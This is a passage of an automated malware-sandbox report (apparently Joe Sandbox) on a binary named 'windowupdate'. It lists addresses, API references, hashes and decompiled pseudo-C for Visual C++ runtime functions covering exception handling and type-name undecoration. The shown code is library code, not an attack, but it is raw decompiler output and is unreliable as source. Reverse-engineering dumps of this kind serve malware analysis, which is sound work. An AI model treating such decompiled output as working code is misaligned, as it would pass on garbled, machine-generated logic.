                      0x00d556a5
                      0x00d556df
                      0x00d556e1
                      0x00d55701
                      0x00d55706
                      0x00d5570a
                      0x00d5570d
                      0x00d556e3
                      0x00d556e7
                      0x00d556ec
                      0x00d556f0
                      0x00d556f3
                      0x00d556f3
                      0x00000000
                      0x00d556e1
                      0x00d5568d
                      0x00d555a0
                      0x00000000
                      0x00d555a5
                      0x00d55588
                      0x00d5558c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d5558c
                      0x00d55522
                      0x00d5552b
                      0x00d5552d
                      0x00d55570
                      0x00000000
                      0x00d55578
                      0x00d5552f
                      0x00d5553b
                      0x00d5553e
                      0x00d55546
                      0x00d5554e
                      0x00d55551
                      0x00d55555
                      0x00d5555d
                      0x00d5555d
                      0x00d55564
                      0x00000000
                      0x00d55580
                      0x00d55557
                      0x00d5555b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d5555b
                      0x00d554ed
                      0x00000000
                      0x00d554f2
                      0x00d554cd
                      0x00d554d5
                      0x00d554d8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d554d8
                      0x00d554af
                      0x00000000

                      APIs
                      • operator+.LIBVCRUNTIMED ref: 00D554AF
                        • Part of subcall function 00D4FB00: DName::DName.LIBVCRUNTIMED ref: 00D4FB0D
                        • Part of subcall function 00D4FB00: DName::operator+.LIBCMTD ref: 00D4FB20
                      • DName::DName.LIBVCRUNTIMED ref: 00D554ED
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::$Name::operator+operator+
                      • String ID: )
                      • API String ID: 308612335-2427484129
                      • Opcode ID: 3e33a533fc7f8bc346594c4834222edfcfaf0a1e195a5bf6ad9a99577fb197dc
                      • Instruction ID: 2f91a00fa117dbcd0160bbd65d33b0aad455f879566905a2e917288caa7474ee
                      • Opcode Fuzzy Hash: 3e33a533fc7f8bc346594c4834222edfcfaf0a1e195a5bf6ad9a99577fb197dc
                      • Instruction Fuzzy Hash: D4E152B2D00508ABDF15DFA0ECA2AEE7775EF44305F148169FD166A156EB30AB08CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4CD60 Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 422COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00D4CD60(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v104;
				char _v108;
				char _v124;
				char _v136;
				void* __ebp;
				intOrPtr _t170;
				void* _t175;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t203;
				signed char _t209;
				signed char _t213;
				void* _t214;
				void* _t236;
				void* _t245;
				signed char _t254;
				signed char _t255;
				void* _t265;
				void* _t266;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t357;
				void* _t358;

				_t353 = __esi;
				_t352 = __edi;
				_t266 = __ebx;
				_v5 = 0;
				_v12 = 0xffffffff;
				_t267 = _a16;
				_t170 = E00D5B4A0(_a8, _a16, _a20);
				_t355 = _t354 + 0xc;
				_v12 = _t170;
				if(_v12 < 0xffffffff) {
					L3:
					L00D90DE0(_t266, _t267, _t352, _t353);
					L4:
					if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
						L27:
						E00D4D6F0( &_v56, _a20, 0);
						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
							_t270 =  &_v56;
							if(E00D4E140( &_v56) > 0) {
								if((_a24 & 0x000000ff) != 0) {
									L00D90DE0(_t266,  &_v56, _t352, _t353);
								}
								_t270 = _a4;
								E00D4D280(_t266, _a4, _t352, _a4, _a8, _a12, _a16, _a20, _v12, _a28, _a32);
							}
							goto L74;
						} else {
							_t270 =  &_v56;
							if(E00D4E140( &_v56) <= 0) {
								_t184 = E00D4E130(_a20);
								_t357 = _t355 + 4;
								if(_t184 < 0x19930521) {
									L55:
									L00D90DE0(_t266, _t270, _t352, _t353);
									L56:
									if((_a24 & 0x000000ff) != 0) {
										_push(1);
										_t270 = _a4;
										E00D4B0E0(_a4);
										_t357 = _t357 + 8;
									}
									if(( *_a20 & 0x1fffffff) < 0x19930521) {
										L69:
										L74:
										_t175 = E00D4C670(_t266, _t270, _t352, _t353);
										if( *((intOrPtr*)(_t175 + 0x1c)) != 0) {
											return L00D90DE0(_t266, _t270, _t352, _t353);
										}
										return _t175;
									} else {
										_t270 = _a20;
										_t189 = E00D4E100(_a20);
										_t358 = _t357 + 4;
										if(_t189 != 0) {
											L62:
											_t273 = _a20;
											if((E00D4E190(_a20, _a20) & 0x000000ff) != 0) {
												 *((intOrPtr*)(E00D4C670(_t266, _t273, _t352, _t353) + 0x10)) = _a4;
												 *((intOrPtr*)(E00D4C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
												E00D89BF0(_a4);
											}
											_t192 = E00D4E100(_a20);
											_t270 = _a4;
											if((E00D4DF20(_t266, _t352, _t353, _a4, _t192) & 0x000000ff) == 0) {
												 *((intOrPtr*)(E00D4C670(_t266, _t270, _t352, _t353) + 0x10)) = _a4;
												 *((intOrPtr*)(E00D4C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
												if(_a32 != 0) {
													E00D49970(_a32, _a4);
												} else {
													E00D49970(_a8, _a4);
												}
												E00D4DD70(_a8, _a16, _a20);
												E00D4DC70(_t266, _a20, _t352, _t353, E00D4E100(_a20));
												 *((intOrPtr*)(E00D4C670(_t266, _a20, _t352, _t353) + 0x10)) = _a4;
												_t203 = E00D4C670(_t266, _a20, _t352, _t353);
												_t270 = _a12;
												 *((intOrPtr*)(_t203 + 0x14)) = _a12;
											}
											goto L69;
										}
										_t209 = E00D4E190(_t270, _a20);
										_t358 = _t358 + 4;
										if((_t209 & 0x000000ff) == 0 || _a28 != 0) {
											goto L69;
										} else {
											goto L62;
										}
									}
								}
								_t213 = E00D4E190( &_v56, _a20);
								_t357 = _t357 + 4;
								_t270 = _t213 & 0x000000ff;
								if((_t213 & 0x000000ff) != 0) {
									L54:
									goto L56;
								}
								_t214 = E00D4E100(_a20);
								_t357 = _t357 + 4;
								if(_t214 == 0) {
									goto L55;
								}
								goto L54;
							}
							E00D496D0(_t266, _t352, _t353,  &_v88,  &_v56, _v12, _a16, _a20, _a28);
							_t357 = _t355 + 0x18;
							_v40 = _v88;
							_v36 = _v84;
							while(1) {
								_t270 =  &_v40;
								if((E00D4D950( &_v40,  &_v80) & 0x000000ff) == 0) {
									break;
								}
								E00D4D8C0( &_v40,  &_v108);
								if(_v108 > _v12 || _v12 > _v104) {
									goto L34;
								} else {
									_push(0);
									_push(0);
									E00D4D6C0( &_v64,  &_v108);
									_v28 =  &_v64;
									E00D4E0B0(_v28,  &_v48);
									E00D4E0D0(_v28,  &_v72);
									while((E00D4D840( &_v48,  &_v72) & 0x000000ff) != 0) {
										E00D4D880( &_v48,  &_v124);
										_v20 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc)) + 4;
										_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc))));
										while(_v16 > 0) {
											_v32 =  *_v20;
											_t236 = E00D4E030( &_v124, _v32,  *((intOrPtr*)(_a4 + 0x1c)));
											_t357 = _t357 + 0xc;
											if(_t236 != 0) {
												_push(_a24 & 0x000000ff);
												_push(_v5 & 0x000000ff);
												E00D4CC90(_a4, _a8, _a12, _a16, _a20,  &_v124, _v32,  &_v108, _a28, _a32);
												_t357 = _t357 + 0x30;
												goto L49;
											}
											_v16 = _v16 - 1;
											_v20 = _v20 + 4;
										}
										E00D4D910( &_v48);
									}
									L49:
									L34:
									E00D4D930( &_v40);
									continue;
								}
							}
							goto L56;
						}
					} else {
						_t307 = _a4;
						if( *((intOrPtr*)(_a4 + 0x1c)) != 0) {
							goto L27;
						}
						_t245 = E00D4C670(_t266, _t307, _t352, _t353);
						if( *((intOrPtr*)(_t245 + 0x10)) == 0) {
							return _t245;
						}
						_a4 =  *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x10));
						_a12 =  *(E00D4C670(_t266, _t307, _t352, _t353) + 0x14);
						_v5 = 1;
						if(_a4 == 0) {
							L20:
							L00D90DE0(_t266, _t307, _t352, _t353);
							L21:
							if( *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x1c)) != 0) {
								_v24 =  *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x1c));
								 *((intOrPtr*)(E00D4C670(_t266,  *((intOrPtr*)(E00D4C670(_t266, _t307, _t352, _t353) + 0x1c)), _t352, _t353) + 0x1c)) = 0;
								_t254 = E00D4DF20(_t266, _t352, _t353, _a4, _v24);
								_t355 = _t355 + 8;
								_t309 = _t254 & 0x000000ff;
								if((_t254 & 0x000000ff) == 0) {
									_t255 = E00D4DFD0(_v24);
									_t355 = _t355 + 4;
									if((_t255 & 0x000000ff) == 0) {
										E00D89BF0(_t309);
									} else {
										_push(1);
										E00D4B0E0(_a4);
										_t355 = _t355 + 8;
										E00D4D750( &_v136);
										E00D4BE10( &_v136, 0xdf3bbc);
									}
								}
							}
							goto L27;
						}
						_t307 = _a4;
						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3) {
							L19:
							goto L21;
						} else {
							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930520) {
								L18:
								if( *((intOrPtr*)(_a4 + 0x1c)) == 0) {
									goto L20;
								}
								goto L19;
							}
							_t307 = _a4;
							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_a4 + 0x14)) == 0x19930522) {
								goto L18;
							} else {
								goto L19;
							}
						}
					}
				}
				_t267 = _a16;
				_t265 = E00D4DF10(_a16, _a20);
				_t355 = _t355 + 8;
				if(_v12 >= _t265) {
					goto L3;
				} else {
					goto L4;
				}
			}













































                      0x00d4cd60
                      0x00d4cd60
                      0x00d4cd60
                      0x00d4cd69
                      0x00d4cd6d
                      0x00d4cd78
                      0x00d4cd80
                      0x00d4cd85
                      0x00d4cd88
                      0x00d4cd8f
                      0x00d4cda8
                      0x00d4cda8
                      0x00d4cdad
                      0x00d4cdb6
                      0x00d4cef5
                      0x00d4cefe
                      0x00d4cf0c
                      0x00d4d225
                      0x00d4d22f
                      0x00d4d237
                      0x00d4d239
                      0x00d4d239
                      0x00d4d25a
                      0x00d4d25e
                      0x00d4d263
                      0x00000000
                      0x00d4cf47
                      0x00d4cf47
                      0x00d4cf51
                      0x00d4d0c9
                      0x00d4d0ce
                      0x00d4d0d6
                      0x00d4d0fd
                      0x00d4d0fd
                      0x00d4d102
                      0x00d4d108
                      0x00d4d10a
                      0x00d4d10c
                      0x00d4d110
                      0x00d4d115
                      0x00d4d115
                      0x00d4d127
                      0x00d4d223
                      0x00d4d266
                      0x00d4d266
                      0x00d4d26f
                      0x00000000
                      0x00d4d273
                      0x00000000
                      0x00d4d12d
                      0x00d4d12d
                      0x00d4d131
                      0x00d4d136
                      0x00d4d13b
                      0x00d4d15e
                      0x00d4d15e
                      0x00d4d16f
                      0x00d4d179
                      0x00d4d184
                      0x00d4d187
                      0x00d4d187
                      0x00d4d190
                      0x00d4d199
                      0x00d4d1aa
                      0x00d4d1b4
                      0x00d4d1bf
                      0x00d4d1c6
                      0x00d4d1df
                      0x00d4d1c8
                      0x00d4d1d0
                      0x00d4d1d0
                      0x00d4d1f0
                      0x00d4d205
                      0x00d4d215
                      0x00d4d218
                      0x00d4d21d
                      0x00d4d220
                      0x00d4d220
                      0x00000000
                      0x00d4d1aa
                      0x00d4d141
                      0x00d4d146
                      0x00d4d14e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4d14e
                      0x00d4d127
                      0x00d4d0dc
                      0x00d4d0e1
                      0x00d4d0e4
                      0x00d4d0e9
                      0x00d4d0fb
                      0x00000000
                      0x00d4d0fb
                      0x00d4d0ef
                      0x00d4d0f4
                      0x00d4d0f9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4d0f9
                      0x00d4cf6f
                      0x00d4cf74
                      0x00d4cf7d
                      0x00d4cf80
                      0x00d4cf8d
                      0x00d4cf91
                      0x00d4cf9e
                      0x00000000
                      0x00000000
                      0x00d4cfab
                      0x00d4cfb6
                      0x00000000
                      0x00d4cfc2
                      0x00d4cfc2
                      0x00d4cfc4
                      0x00d4cfcd
                      0x00d4cfd5
                      0x00d4cfdf
                      0x00d4cfeb
                      0x00d4cffa
                      0x00d4d018
                      0x00d4d029
                      0x00d4d037
                      0x00d4d04e
                      0x00d4d059
                      0x00d4d06b
                      0x00d4d070
                      0x00d4d075
                      0x00d4d07d
                      0x00d4d082
                      0x00d4d0ab
                      0x00d4d0b0
                      0x00000000
                      0x00d4d0b0
                      0x00d4d042
                      0x00d4d04b
                      0x00d4d04b
                      0x00d4cff5
                      0x00d4cff5
                      0x00d4d0be
                      0x00d4cf85
                      0x00d4cf88
                      0x00000000
                      0x00d4cf88
                      0x00d4cfb6
                      0x00000000
                      0x00d4d0c3
                      0x00d4cdf1
                      0x00d4cdf1
                      0x00d4cdf8
                      0x00000000
                      0x00000000
                      0x00d4cdfe
                      0x00d4ce07
                      0x00000000
                      0x00000000
                      0x00d4ce16
                      0x00d4ce21
                      0x00d4ce24
                      0x00d4ce2c
                      0x00d4ce71
                      0x00d4ce71
                      0x00d4ce76
                      0x00d4ce7f
                      0x00d4ce89
                      0x00d4ce91
                      0x00d4cea0
                      0x00d4cea5
                      0x00d4cea8
                      0x00d4cead
                      0x00d4ceb5
                      0x00d4ceba
                      0x00d4cec2
                      0x00d4cef0
                      0x00d4cec4
                      0x00d4cec4
                      0x00d4ceca
                      0x00d4cecf
                      0x00d4ced8
                      0x00d4cee9
                      0x00d4cee9
                      0x00d4cec2
                      0x00d4cead
                      0x00000000
                      0x00d4ce7f
                      0x00d4ce2e
                      0x00d4ce37
                      0x00d4ce6f
                      0x00000000
                      0x00d4ce42
                      0x00d4ce4c
                      0x00d4ce66
                      0x00d4ce6d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4ce6d
                      0x00d4ce4e
                      0x00d4ce58
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d4ce58
                      0x00d4ce37
                      0x00d4cdb6
                      0x00d4cd95
                      0x00d4cd99
                      0x00d4cd9e
                      0x00d4cda4
                      0x00000000
                      0x00d4cda6
                      0x00000000
                      0x00d4cda6

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CDFE
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE0E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE19
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE76
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE81
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4CE8C
                      • Is_bad_exception_allowed.LIBVCRUNTIMED ref: 00D4CEB5
                        • Part of subcall function 00D4DFD0: type_info::operator==.LIBVCRUNTIMED ref: 00D4E00D
                      • ___DestructExceptionObject.LIBCMTD ref: 00D4CECA
                      • std::bad_alloc::bad_alloc.LIBCMTD ref: 00D4CED8
                        • Part of subcall function 00D4D750: std::exception::exception.LIBCMTD ref: 00D4D761
                        • Part of subcall function 00D4BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 00D4BEAA
                      • _Smanip.LIBCPMTD ref: 00D4CEFE
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 00D4CF88
                      • weak_ptr.LIBCPMTD ref: 00D4CFDF
                      • __FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 00D4CFEB
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 00D4CFF5
                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00D4D001
                      • CatchIt.LIBCMTD ref: 00D4D0AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
                      • String ID: csm$csm$csm
                      • API String ID: 2995349249-393685449
                      • Opcode ID: 03d46b53caf835541bd45592025745019a04647e925b48f0b108c9ee35340dc2
                      • Instruction ID: 0ca172a7a58183a8644cb7540f7682e4fec0b7d1ae7b51772bc6f7e497175f36
                      • Opcode Fuzzy Hash: 03d46b53caf835541bd45592025745019a04647e925b48f0b108c9ee35340dc2
                      • Instruction Fuzzy Hash: A6F18DB5A11209EFCF18DFA4D881AAE7B76FF58300F148558F9059B252DB30EA45CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D52CD0 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 326COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D52CD0(signed int _a4, signed int _a8) {
				char _v12;
				signed int _v13;
				signed int _v14;
				void* _v15;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				char _v100;
				signed int _v104;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				char _v132;
				signed int _v136;
				char _v140;
				signed int _v144;
				char _v148;
				signed int _v152;
				char _v156;
				signed int _v160;
				char _v164;
				signed int _v168;
				char _v172;
				signed int _v176;
				char _v180;
				signed int _v184;
				char _v188;
				signed int _v192;
				char _v196;
				signed int _v200;
				char _v204;
				signed int _v208;
				char _v212;
				signed int _v216;
				char _v220;
				signed int _v224;
				char _v228;
				signed int _v232;
				char _v236;
				signed int _v240;
				char _v244;
				signed int _v248;
				char _v252;
				signed int _v256;
				char _v260;
				void* _v264;
				void* _v268;
				intOrPtr _v272;
				char _v276;
				signed int _v280;
				char _v284;
				intOrPtr _v288;
				char _v292;
				signed int _v296;
				char _v300;
				char _v308;
				char _v316;
				char _v324;
				char _v332;
				char _v340;
				void* _v348;
				char _v356;
				signed int _t219;
				signed int _t225;
				void* _t227;
				signed int _t229;
				signed int _t232;
				char _t236;
				char _t239;
				char _t243;
				signed int _t248;
				signed int _t273;
				signed int _t309;
				signed int _t310;
				signed int _t313;
				char* _t314;
				char* _t315;
				signed int _t318;
				void* _t321;
				void* _t323;

				_t219 =  *0xf20640; // 0x0
				if( *_t219 == 0) {
					E00D4FB00(__eflags, _a4, 1, _a8);
					return _a4;
				}
				_t309 =  *0xf20640; // 0x0
				_v15 =  *_t309;
				_t273 =  *0xf20640; // 0x0
				 *0xf20640 = _t273 + 1;
				_t310 = _v15;
				_v13 = _t310;
				_v14 = 0;
				_v20 = 0xffffffff;
				E00D4F3F0( &_v12);
				_v24 = _v13 & 0x000000ff;
				_v24 = _v24 - 0x43;
				if(_v24 > 0x1c) {
					L35:
					_t225 =  *0xf20640; // 0x0
					 *0xf20640 = _t225 - 1;
					_t227 = E00D54C20(_t310,  &_v324);
					_t323 = _t321 + 4;
					E00D4F820( &_v12, _t227);
					_t229 = E00D5A560( &_v12);
					__eflags = _t229;
					if(_t229 == 0) {
						L37:
						if(_v20 != 0xffffffff) {
							E00D4F3F0( &_v44);
							E00D4F240( &_v60, _a8);
							__eflags = _v20 - 0xfffffffe;
							if(_v20 != 0xfffffffe) {
								_t232 = E00D5A560(_a8);
								__eflags = _t232;
								if(_t232 != 0) {
									__eflags = _v20 & 0x00000001;
									if((_v20 & 0x00000001) == 0) {
										_t313 = _v20 & 0x00000002;
										__eflags = _t313;
										if(_t313 != 0) {
											_t236 = E00D50060("volatile", 8);
											_t323 = _t323 + 8;
											_v300 = _t236;
											_v296 = _t313;
											E00D4F7E0( &_v44,  &_v300);
										}
									} else {
										_t239 = E00D50060("const", 5);
										_t323 = _t323 + 8;
										_v284 = _t239;
										_v280 = _t310;
										_t314 =  &_v284;
										E00D4F7E0( &_v44, _t314);
										__eflags = _v20 & 0x00000002;
										if((_v20 & 0x00000002) != 0) {
											_t243 = E00D50060(" volatile", 9);
											_t323 = _t323 + 8;
											_v292 = _t243;
											_v288 = _t314;
											E00D4FCA0( &_v44,  &_v292);
										}
									}
								}
								E00D56A70(_a4,  &_v44,  &_v60);
								return _a4;
							}
							E00D5AA80( &_v60);
							_t315 =  &_v60;
							E00D56A90( &_v52,  &_v44, _t315);
							_t248 = E00D5A520( &_v52);
							__eflags = _t248;
							if(_t248 == 0) {
								_v276 = E00D50060(0xdc8da8, 2);
								_v272 = _t315;
								E00D4FCA0( &_v52,  &_v276);
							}
							E00D4F240(_a4,  &_v52);
							return _a4;
						}
						_v28 = _v13 & 0x000000ff;
						_v28 = _v28 - 0x43;
						if(_v28 > 0x1c) {
							L45:
							if(E00D5A560(_a8) == 0) {
								E00D4FD40( &_v12, E00D4FAD0( &_v356, 0x20, _a8));
							}
							E00D4F240(_a4,  &_v12);
							return _a4;
						}
						_t318 = _v28;
						_t144 = _t318 + 0xd535fc; // 0x498d02
						switch( *((intOrPtr*)(( *_t144 & 0x000000ff) * 4 +  &M00D535EC))) {
							case 0:
								_v260 = E00D50060("signed ", 7);
								_v256 = __edx;
								__ecx =  &_v12;
								__edx =  &_v260;
								 &_v340 = E00D4FAA0( &_v340,  &_v260,  &_v12);
								__ecx =  &_v12;
								__eax = E00D4F820(__ecx, __eax);
								goto L45;
							case 1:
								_v252 = E00D50060("unsigned ", 9);
								_v248 = _t318;
								_t264 = E00D4FAA0( &_v332,  &_v252,  &_v12);
								_t323 = _t323 + 0x14;
								E00D4F820( &_v12, _t264);
								goto L45;
							case 2:
								__ecx = _v14 & 0x000000ff;
								_v32 = __ecx;
								_v32 = _v32 - 0x45;
								_v32 = _v32 - 0x45;
								__eflags = _v32 - 8;
								if(_v32 > 8) {
									goto L45;
								}
								__eax = _v32;
								switch( *((intOrPtr*)(_v32 * 4 +  &M00D5361C))) {
									case 0:
										goto L44;
									case 1:
										goto L45;
								}
							case 3:
								goto L45;
						}
					}
					E00D4F240(_a4,  &_v12);
					return _a4;
				}
				_t310 = _v24;
				_t13 = _t310 + 0xd53528; // 0x498d09
				switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M00D534FC))) {
					case 0:
						_t269 = E00D50060("char", 4);
						_t323 = _t321 + 8;
						_v68 = _t269;
						_v64 = _t310;
						E00D4F7E0( &_v12,  &_v68);
						goto L37;
					case 1:
						_v76 = E00D50060("short", 5);
						_v72 = __edx;
						__edx =  &_v76;
						__ecx =  &_v12;
						__eax = E00D4F7E0(__ecx,  &_v76);
						goto L37;
					case 2:
						_v84 = E00D50060("int", 3);
						_v80 = __edx;
						__eax =  &_v84;
						__ecx =  &_v12;
						__eax = E00D4F7E0(__ecx,  &_v84);
						goto L37;
					case 3:
						_v92 = E00D50060("long", 4);
						_v88 = __edx;
						__ecx =  &_v92;
						__ecx =  &_v12;
						__eax = E00D4F7E0(__ecx,  &_v92);
						goto L37;
					case 4:
						_v100 = E00D50060("float", 5);
						_v96 = __edx;
						__edx =  &_v100;
						__ecx =  &_v12;
						__eax = E00D4F7E0(__ecx,  &_v100);
						goto L37;
					case 5:
						L9:
						_v116 = E00D50060("double", 6);
						_v112 = __edx;
						__ecx =  &_v116;
						__ecx =  &_v12;
						__eax = E00D4FCA0(__ecx,  &_v116);
						goto L37;
					case 6:
						_v108 = E00D50060("long ", 5);
						_v104 = __edx;
						__eax =  &_v108;
						__ecx =  &_v12;
						__eax = E00D4F7E0( &_v12,  &_v108);
						goto L9;
					case 7:
						_v13 & 0x000000ff = _v13 & 3;
						_v20 = _v13 & 3;
						goto L37;
					case 8:
						_v244 = E00D50060("void", 4);
						_v240 = __edx;
						__edx =  &_v244;
						__ecx =  &_v12;
						__eax = E00D4F7E0(__ecx,  &_v244);
						goto L37;
					case 9:
						__eax =  *0xf20640;
						_v16 =  *( *0xf20640);
						 *0xf20640 =  *0xf20640 + 1;
						 *0xf20640 =  *0xf20640 + 1;
						_v14 = _v16;
						__ecx = _v14 & 0x000000ff;
						_v36 = __ecx;
						__eflags = _v36 - 0x59;
						if(_v36 > 0x59) {
							L32:
							_v236 = E00D50060("UNKNOWN", 7);
							_v232 = __edx;
							__ecx =  &_v236;
							__ecx =  &_v12;
							__eax = E00D4F7E0(__ecx,  &_v236);
							L33:
							goto L37;
						}
						__edx = _v36;
						__eax =  *(_v36 + 0xd53590) & 0x000000ff;
						switch( *((intOrPtr*)(( *(_v36 + 0xd53590) & 0x000000ff) * 4 +  &M00D53548))) {
							case 0:
								 *0xf20640 =  *0xf20640 - 1;
								 *0xf20640 =  *0xf20640 - 1;
								__ecx =  &_v12;
								__eax = E00D4F920(__ecx, 1);
								goto L33;
							case 1:
								_v228 = E00D50060("__w64 ", 6);
								_v224 = __edx;
								__edx = _a8;
								 &_v316 = E00D52CD0( &_v316, _a8);
								__ecx =  &_v228;
								__edx = _a4;
								__eax = _a4;
								return _a4;
							case 2:
								_v132 = E00D50060("__int8", 6);
								_v128 = __edx;
								__edx =  &_v132;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v132);
								goto L33;
							case 3:
								_v140 = E00D50060("__int16", 7);
								_v136 = __edx;
								__eax =  &_v140;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v140);
								goto L33;
							case 4:
								_v148 = E00D50060("__int32", 7);
								_v144 = __edx;
								__ecx =  &_v148;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v148);
								goto L33;
							case 5:
								_v156 = E00D50060("__int64", 7);
								_v152 = __edx;
								__edx =  &_v156;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v156);
								goto L33;
							case 6:
								_v164 = E00D50060("__int128", 8);
								_v160 = __edx;
								__eax =  &_v164;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v164);
								goto L33;
							case 7:
								_v124 = E00D50060("bool", 4);
								_v120 = __edx;
								__ecx =  &_v124;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v124);
								goto L33;
							case 8:
								_v20 = 0xfffffffe;
								goto L33;
							case 9:
								_v212 = E00D50060("auto", 4);
								_v208 = __edx;
								__eax =  &_v212;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v212);
								goto L33;
							case 0xa:
								_v180 = E00D50060("char8_t", 7);
								_v176 = __edx;
								__edx =  &_v180;
								__ecx =  &_v12;
